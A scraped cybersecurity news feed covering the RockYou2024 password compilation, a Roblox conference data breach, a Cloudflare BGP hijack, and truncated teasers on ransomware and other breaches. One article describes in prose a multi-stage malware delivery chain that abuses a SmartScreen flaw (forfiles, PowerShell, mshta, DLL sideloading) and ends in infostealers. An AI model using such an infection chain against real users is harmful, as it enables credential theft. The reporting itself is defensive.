Security researchers are scrambling to assess the fallout from a massive leak of stolen passwords, dubbed "RockYou2024." Uploaded to a notorious cybercrime forum, the database allegedly contains nearly 10 billion unique passwords – a staggering figure that dwarfs previous records. Unprecedented Scale of show more ...
RockYou2024 Password Leak According to Cybernews researchers, the RockYou2024 compilation appears to be the largest collection of leaked credentials ever discovered. The data offered by a hacker using the alias "ObamaCare" reportedly consists of 9.948 billion unique passwords in plain text format. This builds upon the RockYou2021 database, which exposed 8.4 billion passwords, with an additional 1.5 billion entries added from 2021 to 2024. Researchers estimate the trove originates from at least 4,000 separate data breaches spanning two decades. Credential Stuffing Bonanza Security experts warn that RockYou2024 presents a significant risk for credential stuffing attacks. These automated assaults use stolen login credentials against multiple online services, often succeeding when users employ the same password across different accounts. The researchers emphasize the danger that "revealing that many passwords for threat actors substantially heightens the risk of credential stuffing attacks." Attackers could potentially gain unauthorized access to a vast array of targets, including personal accounts, internet-connected devices, and even industrial control systems. Furthermore, when combined with other leaked data like email addresses – readily available on hacker forums – RockYou2024 could fuel a wave of data breaches, financial fraud, and identity theft. Mitigating the RockYou2024 Threat Chris Bates, chief information security officer at SandboxAQ, said, “Companies should assume all passwords are compromised and build the correct mitigating controls. This include phishing resistant MFA, passwordless authentication, and behaviour-based detection and response programs to detect malicious use.” Adding to this advice, these are the steps users can take to mitigate the risks associated with RockYou2024. Services like the "AmIBreached" data leak checker from Cyble allow individuals to verify if their credentials have been compromised. More importantly, adopting strong, unique passwords for every online account is crucial. Password managers like LastPass, Password1 and Enpass can be invaluable tools for generating and storing complex passwords, ensuring each account has a unique login. Finally, identity theft protection services can provide an extra layer of security, assisting with recovery efforts in the event of fraud or identity theft. The Road Ahead The RockYou2024 leak serves as a stark reminder of the ever-evolving cyber threat landscape. Marc Manzano, general manager at SandboxAQ, said, “It's imperative for organizations to implement and enforce stringent password policies, educate users about the risks of password reuse, and put into action multi-factor authentication widespread adoption.” He added, “Enhancing overall IT systems security by deploying modern cryptography management platforms will be crucial in defending against large-scale threats leveraging stolen passwords.” Organizations and individuals alike must prioritize robust password security practices to stay ahead of malicious actors. As investigations into the leak continue, security professionals remain vigilant, anticipating the potential consequences of this colossal data breach.
American video game giant Roblox has reported a data breach stemming from a third-party service provider that helps host its annual Developer Conference. Result? Data related to its in-person and online attendees registered through the third-party's platform in the last two years leaked. Roblox Corp. is an show more ...
American video game developer based in San Mateo, California. Founded in 2004 by David Baszucki and Erik Cassel, the company is the developer of Roblox, which was released in 2006. As of December 2023, the company employs over 2,400 people. The gaming company has an average monthly user base of 214 million players and makes around $7 million per day from a user base that is primarily youngsters below the age of 16 years. In fact, 21% of its users are aged between 9 and 12 years. Roblox Developers Conference Data Leak Roblox on Friday notified all developers who registered on its FNTech platform about a recent data breach. FNTech is advertised on its website as a one-stop shop for everything related to in-person, virtual and hybrid events. Roblox said an "unauthorized" actor intruded its third-party's systems and accessed a subset of user information from a Roblox Developer Conference registration list from there. Roblox said the details compromised likely contained the Developer Conferences users full names, email addresses and IP addresses that were possibly collected for users attending the conference via the hybrid option. [caption id="attachment_80631" align="aligncenter" width="814"] Roblox data breach notification (Source: X)[/caption] Roblox did not confirm if any other data or if its own systems were affected in a supply chain-type attack but said it has "made efforts to ensure this type of incident is avoided in the future." What measures were implemented remains unclear. The Roblox Developer Conference 2024 will be hosted in San Jose, California on September 6-7. Gamers often have valuable virtual assets and in-game purchases linked to their accounts. Hackers exploit vulnerabilities in servers and platforms to steal the data, which can be sold in the underground market. Recently, two prominent online gaming platforms in India, Teenpatti.com and Mobile Premier League (MPL.live), allegedly experienced data breaches. Similarly, Fortnite and Insomniac games also experienced breaches from ransomware actors, which shows a steady interest by threat actors in the gaming sector that has largely been off the radar until now.
Cyble Research and Intelligence Labs (CRIL) researchers have uncovered an active campaign exploiting a Microsoft SmartScreen vulnerability to inject infostealers into users’ machines. Microsoft released a patch for the SmartScreen vulnerability (CVE-2024-21412) in February and CISA even added it to its known show more ...
exploited vulnerabilities catalog, but apparently the patch has seen limited deployment, as Cyble said the campaign is targeting users in multiple regions, including Spain, the U.S., and Australia. Another SmartScreen vulnerability (CVE-2024-29988) was patched in April. Microsoft SmartScreen Vulnerability Exploited by Phishing The campaign begins with phishing lures related to healthcare insurance schemes, transportation notices, and tax-related communications to trick users into downloading malicious payloads. The spam emails contain a link that redirects users to a WebDAV share using a search protocol to deceive them into executing a malicious internet shortcut file, the Cyble researchers said. The multi-stage attack that follows utilizes legitimate tools such as forfiles.exe, PowerShell, mshta, and other trusted files to circumvent security measures, and then DLL sideloading and IDATLoader inject the final payload into explorer.exe. The campaign delivers Lumma and Meduza Stealer as its final payloads. Zero-Day Attack Discovered in January The Zero Day Initiative (ZDI) uncovered a sophisticated DarkGate campaign in mid-January that was exploiting the vulnerability through fake software installers. The APT group Water Hydra has also been leveraging CVE-2024-21412 in a targeted campaign against financial market traders, bypassing SmartScreen to deploy the DarkMe remote access trojan (RAT). In the latest campaign, the Cyble researchers said threat actors (TAs) have been exploiting the vulnerability to bypass Microsoft Defender SmartScreen and deploy payloads on victims’ systems. The image below shows the sophisticated infection chain observed by the Cyble researchers in the latest attacks. [caption id="attachment_80653" align="alignnone" width="600"] Microsoft SmartScreen vulnerability attack chain (source: Cyble blog)[/caption] Lure documents used in the campaign target Spanish taxpayers, transportation companies with emails purportedly from the U.S. Department of Transportation, and individuals in Australia by mimicking official Medicare enrollment forms. Sophisticated Attack Chain Upon execution, the malicious LNK file triggers the forfiles utility, a legitimate Windows executable designed for batch processing files, the researchers said. If the utility successfully finds the “win.ini” file within the C:Windows directory, forfiles.exe proceeds to execute a PowerShell command leveraging “mshta.exe” to execute a malicious file hosted on a remote server. The hosted file is named “dialer.exe”, which has been altered to include embedded malicious JavaScript that utilizes the String.fromCharCode() method to decode and execute a PowerShell Script. That script decrypts the AES-encrypted blocks to load yet another PowerShell script, which downloads the lure document and another 7z installer file from the remote server and saves them to C:UsersuserAppDataRoaming. Upon successful download, the PowerShell script opens the lure document and executes the installer file. The installer file then drops additional files, including clean files, dependency DLLs, a malicious DLL for side-loading, and an encrypted IDAT loader, the Cyble researchers wrote. After placing all the files in the %appdata% directory, the installer file begins DLL side-loading by launching a legitimate file. “This legitimate file then loads a malicious DLL, which retrieves the content of the IDAT loader, decrypts it, and injects the payload into explorer.exe,” the researchers said. “In this campaign, the injected content, recognized as Lumma and Mdeuza Stealer, subsequently carries out malicious operations on compromised systems.” ‘Increasingly Dynamic and Dangerous Threat Landscape’ The Cyble researchers said the recent surge in the exploitation of CVE-2024-21412, along with the adoption of sophisticated techniques such as DLL sideloading and IDATLoader combinations, “highlights how cyber threats continue to evolve in an increasingly dynamic and dangerous threat landscape.” Malware-as-a-Service (MaaS) could amplify that trend by allowing malicious actors to deploy advanced tools more readily, they said. The researchers recommended a number of cybersecurity controls to help fight these sophisticated threats: Advanced email filtering solutions can help detect and block malicious attachments and links, adding extra protection on top of cybersecurity training for end users. The forfiles utility should be monitored and restricted, and the execution of scripting languages on user workstations and servers should be disabled or restricted if they are not essential for legitimate purposes. Application whitelisting will help ensure that only approved and trusted applications and DLLs can execute on your systems. Network segmentation can protect critical workloads and limit the spread of malware within an organization. The Cyble blog also includes MITRE ATT&CK Techniques, Indicators of Compromise (IoCs) and a YARA detection rule.
Cloudflare’s privacy-first public DNS resolver service was hit by two simultaneous BGP issues recently, resulting in an unintentional BGP hijacking incident that highlights ongoing concerns over the security of the 35-year-old internet routing protocol. The outage and slowdowns that affected the free Cloudflare DNS show more ...
resolver service “1.1.1.1” for a few hours on June 27 affected less than 1 percent of internet traffic, but the issue is likely to bring fresh attention to BGP, dubbed the “three-napkin protocol” for the way it was drafted on a lunch break at an IETF meeting in 1989. The FCC recently voted to require ISPs to report on their BGP security progress, a preliminary vote that will go through a public comment period before it can be finalized. Historical Use of 1.1.1.1 Hits Cloudflare DNS Resolver Service One problem affecting the six-year-old Cloudflare DNS resolver service is the historical use of 1.1.1.1 by networks in labs or as a testing IP address, “resulting in some residual unexpected traffic or blackholed routing behavior. Because of this, Cloudflare is no stranger to dealing with the effects of BGP misrouting traffic,” Cloudflare engineers wrote in a blog post reporting the incidents. The June 27 incident combined a routing hijack with a BGP route leak to effectively bring the service to a halt for users in affected regions. A routing hijack of 1.1.1.1 could potentially occur if a network assigned, say, 1.1.1.1/32 to one of their routers and shared the prefix with their internal network, which would make it difficult for their customers to route to the 1.1.1.1 DNS service. “If they advertise the 1.1.1.1/32 prefix outside their immediate network, the impact can be even greater,” the engineers wrote. The reason 1.1.1.1/32 would be selected instead of the 1.1.1.0/24 used by Cloudflare is due to Longest Prefix Matching (LPM), they said. Many prefixes in a route table could match for the 1.1.1.1 address, but 1.1.1.1/32 is considered the “longest match” by the LPM algorithm because it has the highest number of identical bits and longest subnet mask while also matching the 1.1.1.1 address. “In simple terms, we would call 1.1.1.1/32 the ‘most specific’ route available to 1.1.1.1,” Cloudflare said. [caption id="attachment_80640" align="alignnone" width="500"] How BGP hijacks happen (source: Cloudflare)[/caption] BGP route leaks occur “when a network becomes an upstream, in terms of BGP announcement, for a network it shouldn’t be an upstream provider for. ... If enough networks within the Default-Free Zone (DFZ) accept a route leak, it may be used widely for forwarding traffic along the bad path. Often this will cause the network leaking the prefixes to overload, as they aren’t prepared for the amount of global traffic they are now attracting.” These issues can happen to any IP address or prefix, but 1.1.1.1 is “is such a recognizable and historically misappropriated address that it tends to be more prone to accidental hijacks or leaks than other IP resources,” Cloudflare said. What Happened to the Cloudflare 1.1.1.1 Service The Cloudflare 1.1.1.1 incident began when AS267613 (Eletronet S.A.) began announcing 1.1.1.1/32 to peers, providers, and customers. A minute later, AS262504 (Nova) leaked 1.1.1.0/24, also received from AS267613, upstream to AS1031 (PEER 1 Global Internet Exchange), which propagated 1.1.1.0/24 to various Internet Exchange peers and route-servers, widening the impact of the leak. One tier 1 provider received the 1.1.1.1/32 announcement from AS267613 as a Remote Triggered Blackhole (RTBH, a blunt method of fighting off DDoS attacks) route, causing blackholed traffic for all of the tier 1’s customers. All of that happened in about a minute. Cloudflare engineers responded a little more than an hour later by disabling two partner peering points and engaging with Nova and Eletronet, but the issues weren’t fully resolved until about four hours after they began. “The problem during this incident was AS267613 was unauthorized to blackhole 1.1.1.1/32,” the engineers wrote. “Cloudflare only should have the sole right to leverage RTBH for discarding of traffic destined for AS13335, which is something we would in reality never do.” Cloudflare said AS1031 “does not perform any extensive filtering for customer BGP sessions, and instead just matches on adjacency (in this case, AS262504) and redistributes everything that meets this criteria. Unfortunately, this is irresponsible of AS1031 and causes direct impact to 1.1.1.1 and potentially other services that fall victim to the unguarded route propagation. While the original leaking network was AS262504, impact was greatly amplified by AS1031 and others when they accepted the hijack or leak and further distributed the announcements.” Cloudflare’s BGP Security Recommendations Cloudflare offered several BGP security recommendations for network providers, particularly major networks with a large sum of downstream Autonomous Systems. RPKI Adoption Resource Public Key Infrastructure adoption “recently reached a major milestone at 50% deployment in terms of prefixes signed by Route Origin Authorization (ROA),” the Cloudflare engineers wrote. “While RPKI certainly helps limit the spread of a hijacked BGP prefix throughout the Internet, we need all networks to do their part, especially major networks with a large sum of downstream Autonomous Systems (AS’s). During the hijack of 1.1.1.1/32, multiple networks accepted and used the route announced by AS267613 for traffic forwarding.” RPKI and Remote-Triggered Blackholing (RTBH) Cloudflare said a significant amount of the impact from the incident was because of a Tier 1 provider accepting 1.1.1.1/32 as a blackhole route from a third party that was not Cloudflare. “This in itself is a hijack of 1.1.1.1, and a very dangerous one,” the Cloudflare engineers said. “RTBH is a useful tool used by many networks when desperate for a mitigation against large DDoS attacks. The problem is the BGP filtering used for RTBH is loose in nature, relying often only on AS-SET objects found in Internet Routing Registries. ... AS-SET filtering is not representative of authority to blackhole a route, such as 1.1.1.1/32. Only Cloudflare should be able to blackhole a destination it has the rights to operate.” A potential fix for lenient filtering of providers on RTBH sessions would again be leveraging an RPKI. An expired IETF draft proposal specified a Discard Origin Authorization (DOA) object that would be used to authorize only specific origins to authorize a blackhole action for a prefix. “If such an object was signed, and RTBH requests validated against the object, the unauthorized blackhole attempt of 1.1.1.1/32 by AS267613 would have been invalid instead of accepted by the Tier 1 provider,” Cloudflare said. BGP Best Practices Simply following BGP best practices laid out by Mutually Agreed Norms for Routing Security (MANRS) and rejecting IPv4 prefixes that are longer than a /24 in the Default-Free Zone (DFZ) would have reduced impact to 1.1.1.1, Cloudflare said. “Rejecting invalid prefix lengths within the wider Internet should be part of a standard BGP policy for all networks.” ASPA for BGP Cloudflare has advocated for the adoption of RPKI into AS Path-based route leak prevention. Under Autonomous System Provider Authorization (ASPA) – still in its draft phase at IETF – ASPA objects are similar to ROAs, except instead of signing prefixes with an authorized origin AS, the AS itself is signed with a list of provider networks that are allowed to propagate their routes, they said. “So, in the case of Cloudflare, only valid upstream transit providers would be signed as authorized to advertise AS13335 prefixes such as 1.1.1.0/24 upstream.” Cloudflare Expands BGP Route Leak Detection Cloudflare has expanded its data sources for its route leak detection system to cover more networks and is “incorporating real-time data into the detection system to allow more timely response toward similar events in the future.” “Like all approaches to solving route leaks, cooperation amongst network operators on the Internet is required for success,” Cloudflare said. “While the actions of external networks are outside of Cloudflare’s direct control, we intend to take every step within both the Internet community and internally at Cloudflare to detect impact more quickly and lessen impact to our users.” Cloudflare also encouraged users to check isbgpsafeyet.com to see if their ISP is enforcing RPKI origin validation.
The vulnerability could be exploited to compromise systems without requiring user interaction, contrary to some severity assessments initially made by Tenable and Red Hat.
Eldorado also encrypts network shares using the SMB protocol, deletes shadow volume copies, and skips certain file types to prevent system damage. Affiliates can customize attacks on Windows, while Linux customization is limited.
Traeger grills face security bugs that could spell trouble for BBQ enthusiasts. High-severity vulnerabilities in the Traeger Grill D2 Wi-Fi Controller could allow remote attackers to control the grill's temperature or shut it down.
Online accounts are increasingly protected by passkey technology, but many platforms like banking, e-commerce, social media, and software development can still be compromised using adversary-in-the-middle (AitM) attacks.
Source: www.databreachtoday.com – Author: 1 Fraud Management & Cybercrime , Ransomware Ransomware Group Apparently Uses Leaked LockBit Builder Code to Mount Attacks Jayant Chakravarti (@JayJay_Tech) • July 5, 2024 New Zealand exercise equipment retailer Elite Fiteness has a ransomware hacker show more ...
problem. (Image: Elite Fiteness) A ransomware group that uses locker malware based on […] La entrada New Zealand Fitness Retailer Hit By DragonForce Ransomware – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: 1 3rd Party Risk Management , Governance & Risk Management , Healthcare HealthEquity Says a Vendor’s Compromised Credentials Led to Data Theft Breach Marianne Kolbasuk McGee (HealthInfoSec) • July 5, 2024 Image: Getty Healthcare benefits plan show more ...
administrator HealthEquity said hackers obtained sensitive data in a breach involving compromised credentials […] La entrada Health Benefits Administrator Reports 3rd-Party Hack to SEC – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: 1 API Security , Fraud Management & Cybercrime , Ransomware Steve King’s Legacy in Cybersecurity: Insights and Reflections Anna Delaney (annamadeline) • July 5, 2024 Clockwise, from top left: Anna Delaney, Tom Field, Richard Bird, Michael Novinson and show more ...
Chris Riotta In this special edition of the ISMG Editors’ Panel, […] La entrada ISMG Editors: A Tribute to Steve King – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Next-Generation Technologies & Secure Development Hacker had Unauthorized Access to Data on Designs for New AI Use Cases Rashmi Ramesh (rashmiramesh_) • July 5, 2024 OpenAi reportedly did not disclose a show more ...
2023 hack into its internal messaging systems. (Image: Shutterstock) A hacker […] La entrada OpenAI Did Not Disclose 2023 Breach to Feds, Public: Report – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
